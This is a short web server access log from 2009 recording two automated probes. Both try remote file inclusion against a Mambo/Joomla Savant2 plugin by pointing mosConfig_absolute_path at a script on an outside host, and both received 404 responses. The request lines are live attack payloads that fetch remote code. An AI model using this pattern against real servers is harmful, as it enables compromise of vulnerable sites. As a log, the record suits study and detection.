61.135.134.78 - - [28/Sep/2009:01:31:33 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:31:36 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
